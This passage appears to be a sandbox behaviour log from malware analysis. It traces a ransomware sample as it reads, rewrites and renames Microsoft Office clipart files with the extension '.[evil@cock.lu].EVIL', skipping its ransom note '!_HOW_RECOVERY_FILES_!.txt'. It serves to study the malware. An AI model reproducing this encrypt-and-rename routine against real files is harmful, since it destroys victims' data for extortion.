0x84b1160840 [0168.704] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.704] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x5160, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5160, lpOverlapped=0x0) returned 1 [0168.704] CloseHandle (hObject=0x1a8) returned 1 [0168.704] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00190_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.705] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.705] __uncaught_exception () returned 0x84b1160800 [0168.705] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.705] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00190_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00190_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00190_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00190_.wmf.[evil@cock.lu].evil")) returned 1 [0168.706] ??_V@YAXPEAX@Z () returned 0x1 [0168.709] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00190_.WMF", dwFileAttributes=0x200) returned 0 [0168.709] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.709] wcsstr (_Str="SO00191_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.709] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00191_.WMF") returned 69 [0168.709] wcscmp (_String1="SO00191_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.709] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00191_.WMF") returned 0x0 [0168.709] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00191_.WMF") returned 0x45 [0168.709] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00191_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.711] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2090, lpOverlapped=0x0) returned 1 [0168.713] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.714] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.714] _errno () returned 0x84b1160840 [0168.714] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.714] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x20a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x20a0, lpOverlapped=0x0) returned 1 [0168.714] CloseHandle (hObject=0x1a8) returned 1 [0168.714] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00191_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.714] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.714] __uncaught_exception () returned 0x84b1160800 [0168.714] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.715] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00191_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00191_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00191_.wmf.[evil@cock.lu].evil")) returned 1 [0168.716] ??_V@YAXPEAX@Z () returned 0x1 [0168.718] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00191_.WMF", dwFileAttributes=0x200) returned 0 [0168.719] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.719] wcsstr (_Str="SO00192_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.719] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00192_.WMF") returned 69 [0168.719] wcscmp (_String1="SO00192_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.719] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00192_.WMF") returned 0x0 [0168.719] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00192_.WMF") returned 0x45 [0168.719] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00192_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00192_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.721] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x280c, lpOverlapped=0x0) returned 1 [0168.723] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.723] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.723] _errno () returned 0x84b1160840 [0168.723] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.723] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x2820, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2820, lpOverlapped=0x0) returned 1 [0168.723] CloseHandle (hObject=0x1a8) returned 1 [0168.723] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00192_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.724] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.724] __uncaught_exception () returned 0x84b1160800 [0168.724] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.724] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00192_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00192_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00192_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00192_.wmf.[evil@cock.lu].evil")) returned 1 [0168.725] ??_V@YAXPEAX@Z () returned 0x1 [0168.727] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00192_.WMF", dwFileAttributes=0x200) returned 0 [0168.727] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.728] wcsstr (_Str="SO00194_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.728] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00194_.WMF") returned 69 [0168.728] wcscmp (_String1="SO00194_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.728] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00194_.WMF") returned 0x0 [0168.728] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00194_.WMF") returned 0x45 [0168.728] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00194_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.730] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x27c0, lpOverlapped=0x0) returned 1 [0168.744] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.744] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.744] _errno () returned 0x84b1160840 [0168.744] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.744] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x27e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x27e0, lpOverlapped=0x0) returned 1 [0168.745] CloseHandle (hObject=0x1a8) returned 1 [0168.745] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00194_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.745] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.745] __uncaught_exception () returned 0x84b1160800 [0168.745] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.745] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00194_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00194_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00194_.wmf.[evil@cock.lu].evil")) returned 1 [0168.747] ??_V@YAXPEAX@Z () returned 0x1 [0168.750] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00194_.WMF", dwFileAttributes=0x200) returned 0 [0168.750] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.750] wcsstr (_Str="SO00197_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.750] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00197_.WMF") returned 69 [0168.750] wcscmp (_String1="SO00197_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.750] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00197_.WMF") returned 0x0 [0168.750] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00197_.WMF") returned 0x45 [0168.750] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00197_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00197_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.752] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x238c, lpOverlapped=0x0) returned 1 [0168.778] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.778] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.778] _errno () returned 0x84b1160840 [0168.778] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.778] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x23a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x23a0, lpOverlapped=0x0) returned 1 [0168.779] CloseHandle (hObject=0x1a8) returned 1 [0168.779] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00197_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.779] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.779] __uncaught_exception () returned 0x84b1160800 [0168.779] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.779] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00197_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00197_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00197_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00197_.wmf.[evil@cock.lu].evil")) returned 1 [0168.784] ??_V@YAXPEAX@Z () returned 0x1 [0168.788] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00197_.WMF", dwFileAttributes=0x200) returned 0 [0168.788] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.788] wcsstr (_Str="SO00199_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.788] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00199_.WMF") returned 69 [0168.788] wcscmp (_String1="SO00199_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.788] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00199_.WMF") returned 0x0 [0168.788] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00199_.WMF") returned 0x45 [0168.788] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00199_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00199_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.791] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x15fe, lpOverlapped=0x0) returned 1 [0168.802] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.802] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.802] _errno () returned 0x84b1160840 [0168.802] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.802] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1600, lpOverlapped=0x0) returned 1 [0168.802] CloseHandle (hObject=0x1a8) returned 1 [0168.803] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00199_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.803] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.803] __uncaught_exception () returned 0x84b1160800 [0168.803] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.803] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00199_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00199_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00199_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00199_.wmf.[evil@cock.lu].evil")) returned 1 [0168.805] ??_V@YAXPEAX@Z () returned 0x1 [0168.808] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00199_.WMF", dwFileAttributes=0x200) returned 0 [0168.809] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.809] wcsstr (_Str="SO00200_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.809] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00200_.WMF") returned 69 [0168.809] wcscmp (_String1="SO00200_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.809] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00200_.WMF") returned 0x0 [0168.809] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00200_.WMF") returned 0x45 [0168.809] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00200_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.811] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2926, lpOverlapped=0x0) returned 1 [0168.819] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.819] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.819] _errno () returned 0x84b1160840 [0168.819] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.819] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x2940, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2940, lpOverlapped=0x0) returned 1 [0168.819] CloseHandle (hObject=0x1a8) returned 1 [0168.819] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00200_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.820] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.820] __uncaught_exception () returned 0x84b1160800 [0168.820] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.820] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00200_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00200_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00200_.wmf.[evil@cock.lu].evil")) returned 1 [0168.821] ??_V@YAXPEAX@Z () returned 0x1 [0168.824] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00200_.WMF", dwFileAttributes=0x200) returned 0 [0168.824] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.825] wcsstr (_Str="SO00208_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.825] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00208_.WMF") returned 69 [0168.825] wcscmp (_String1="SO00208_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.825] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00208_.WMF") returned 0x0 [0168.825] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00208_.WMF") returned 0x45 [0168.825] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00208_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00208_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.827] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2ea0, lpOverlapped=0x0) returned 1 [0168.833] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.833] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.833] _errno () returned 0x84b1160840 [0168.833] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.833] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x2ec0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2ec0, lpOverlapped=0x0) returned 1 [0168.833] CloseHandle (hObject=0x1a8) returned 1 [0168.833] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00208_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.834] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.834] __uncaught_exception () returned 0x84b1160800 [0168.834] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.834] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00208_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00208_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00208_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00208_.wmf.[evil@cock.lu].evil")) returned 1 [0168.835] ??_V@YAXPEAX@Z () returned 0x1 [0168.838] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00208_.WMF", dwFileAttributes=0x200) returned 0 [0168.838] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.839] wcsstr (_Str="SO00212_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.839] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00212_.WMF") returned 69 [0168.839] wcscmp (_String1="SO00212_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.839] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00212_.WMF") returned 0x0 [0168.839] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00212_.WMF") returned 0x45 [0168.839] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00212_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00212_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.842] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4f72, lpOverlapped=0x0) returned 1 [0168.850] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.850] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.850] _errno () returned 0x84b1160840 [0168.850] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.850] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x4f80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4f80, lpOverlapped=0x0) 